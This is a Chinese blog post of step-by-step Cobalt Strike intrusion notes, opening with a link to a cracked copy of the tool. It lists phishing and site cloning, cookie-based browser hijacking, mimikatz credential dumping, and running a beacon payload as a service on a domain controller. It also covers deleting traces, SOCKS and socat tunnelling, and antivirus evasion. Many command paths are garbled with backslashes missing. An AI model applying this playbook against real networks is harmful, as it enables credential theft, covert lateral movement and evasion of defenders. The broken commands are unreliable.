zoukankan      html  css  js  c++  java
  • Cobalt Strike

    COBAIT STRIKE 3.14破解版:

    https://download.csdn.net/download/weixin_41082546/11604021

    客户端攻击重定向设置

    view —application 查看目标系统日志

    attack—web-drive-by—site clone

    在此之前需要先生成一段攻击代码

    钓鱼邮件实施 的4个阶段

    session传递

    将cobait strike 的 session 传递给metasploit框架的兄弟

    新建监听,主机和端口与metasploit 框架兄弟一致

    spawn 将 session 传递给metasploit队友

    浏览器转发

    使用目标的身份进入网站,目前只支持IE浏览器

    其实相当于我们直接使用目标应用在浏览网页,加入对方近期登陆过某些网站并且cookie信息还存在,我们无需密码就可以进入对方的博客、邮箱等。

    设置浏览器代理

    CS上可以看到事件日志信息

    权限提升

    cmd下输入 whoami /groups 查看用户所属系统等级信息

    win vista 之后系统权限等级分为三个等级,高级(管理)、中级(普通)、低级(限制执行)

    powerup 权限提升

    shell whoami /groups 查看用户和组信息

    我们尝试使用powertools 下面的 powerup 来提权

    mimikatz lsadump::cache 获取lasas中的明文口令

    mimikatz misc::memssp

    cd C:windowssysnative

    shell dir mimilas.log

    shell mimilas.log

    shell type mimilas.log

    获取管理员用户凭证,当我们上面执行mimikatz misc::memssp 的时候它已经下载到本地了

    枚举的命令和方法

    内网横向扩展

    powerview 是用 powershell 写的工具

    net 模块 是通过windows 的网络管理API 函数来处理问题

    shell dir \DCc$

    返回拒绝访问,说明我们没有权限

    我们用文件服务器来尝试同样的事情

    shell dir \FILESERVERC$

    如何找出域管理员

    net localgroup \DC

    net group

    注:任何域的管理员都是登录到域的不同机器上的本地管理员权限

    黄金票据

    shell C:windowssysnativeklist

    shell whoami user 查看sid

    upload beacon.exe

    shell copy beacon.exe C:\windows emp

    shell sc \dc create beacon binpath=C:windows empeacon.exe

    shell sc \dc start beacon.exe

    清除痕迹

    shell sc \dc delete beacon.exe

    shell del \dcC$windows empeacon.exe

    socks 转发

    使用CS全局代理进行探测

    反向转发隧道

    设置转发

    钓鱼

    当目标点击了邮件中的链接,我们将获得一个新的session

    ssh通道

    使用metasploit框架 代理链接和socks代理转发来通过“beacon”通道来传输数据。

    ssh 中的 -D 参数可以搭建一个代理服务器来转发任何通过它的连接。

    这里的1080 端口本质上是一个代理服务器,任何通过这个代理服务器的数据都会被转发到远程服务器上。

    socat tcp4-listen:445,fork tcp4:192.168.88.158:445

    通过使用本地socks代理服务器,所有传输的数据自动转入我们攻击的目标

    免杀

    查看SPF 记录

    查看dmarc记录

    使用artifact进行免杀处理

    applet 渗透测试

  • 相关阅读:
    在openwrt上初体验PostgreSQL数据库
    Linux学习笔记(7)-系统资源查看
    Linux学习笔记(6)-工作管理
    Linux学习笔记(5)-进程管理
    Linux学习笔记(4)-文本编辑器vi的使用
    linux学习笔记(3)-文件系统
    Linux学习笔记(2)-用户和用户组
    linux学习笔记(1)-文件处理相关命令
    68.vivado与modelsim的关联以及器件库编译
    67.ARP协议
  • 原文地址:https://www.cnblogs.com/micr067/p/12519761.html
Copyright © 2011-2022 走看看